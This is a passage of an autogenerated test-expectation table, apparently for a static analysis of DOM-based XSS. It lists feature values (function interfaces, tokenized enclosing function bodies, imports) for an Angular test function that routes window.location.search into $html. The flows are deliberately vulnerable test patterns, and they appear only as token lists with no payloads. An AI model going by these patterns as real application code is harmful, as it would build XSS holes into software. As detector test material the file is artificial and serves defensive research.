element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | return of function angularJSServices | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | return of function angularJSServices | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | return of function angularJSServices | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:145:1:174:1 | return of function angularJSServices | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:145:10:145:26 | angularJSServices | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:145:10:145:26 | angularJSServices | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:145:10:145:26 | angularJSServices | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:11 | angular | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:11 | angular | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:11 | angular | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:11 | angular | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:11 | angular | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:18 | angular.module | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:18 | angular.module | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:18 | angular.module | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:18 | angular.module | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:18 | angular.module | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:31 | angular ... p', []) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:31 | angular ... p', []) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:31 | angular ... p', []) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:31 | angular ... p', []) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:31 | angular ... p', []) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:31 | exceptional return of angular ... p', []) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:31 | exceptional return of angular ... p', []) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:31 | exceptional return of angular ... p', []) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:31 | exceptional return of angular ... p', []) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:146:31 | exceptional return of angular ... p', []) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:147:16 | angular ... factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:147:16 | angular ... factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:147:16 | angular ... factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:147:16 | angular ... factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:147:16 | angular ... factory | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:149:11 | angular ... }]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:149:11 | angular ... }]) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:149:11 | angular ... }]) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:149:11 | angular ... }]) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:149:11 | angular ... }]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:149:11 | exceptional return of angular ... }]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:149:11 | exceptional return of angular ... }]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:149:11 | exceptional return of angular ... }]) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:149:11 | exceptional return of angular ... }]) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:149:11 | exceptional return of angular ... }]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:150:16 | angular ... factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:150:16 | angular ... factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:150:16 | angular ... factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:150:16 | angular ... factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:150:16 | angular ... factory | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:152:10 | angular ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:152:10 | angular ... }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:152:10 | angular ... }) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:152:10 | angular ... }) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:152:10 | angular ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:152:10 | exceptional return of angular ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:152:10 | exceptional return of angular ... }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:152:10 | exceptional return of angular ... }) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:152:10 | exceptional return of angular ... }) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:152:10 | exceptional return of angular ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:154:16 | angular ... factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:154:16 | angular ... factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:154:16 | angular ... factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:154:16 | angular ... factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:154:16 | angular ... factory | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:156:11 | angular ... }]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:156:11 | angular ... }]) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:156:11 | angular ... }]) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:156:11 | angular ... }]) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:156:11 | angular ... }]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:156:11 | exceptional return of angular ... }]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:156:11 | exceptional return of angular ... }]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:156:11 | exceptional return of angular ... }]) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:156:11 | exceptional return of angular ... }]) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:156:11 | exceptional return of angular ... }]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:157:16 | angular ... factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:157:16 | angular ... factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:157:16 | angular ... factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:157:16 | angular ... factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:157:16 | angular ... factory | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:159:10 | angular ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:159:10 | angular ... }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:159:10 | angular ... }) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:159:10 | angular ... }) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:159:10 | angular ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:159:10 | exceptional return of angular ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:159:10 | exceptional return of angular ... }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:159:10 | exceptional return of angular ... }) | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:159:10 | exceptional return of angular ... }) | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:159:10 | exceptional return of angular ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:161:16 | angular ... factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:146:5:161:16 | angular ... factory | contextSurroundingFunctionParameters | () 